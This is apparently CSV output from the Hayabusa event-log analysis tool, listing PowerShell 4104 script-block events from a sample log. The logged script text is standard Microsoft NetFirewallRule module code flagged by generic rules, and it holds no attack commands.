${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, 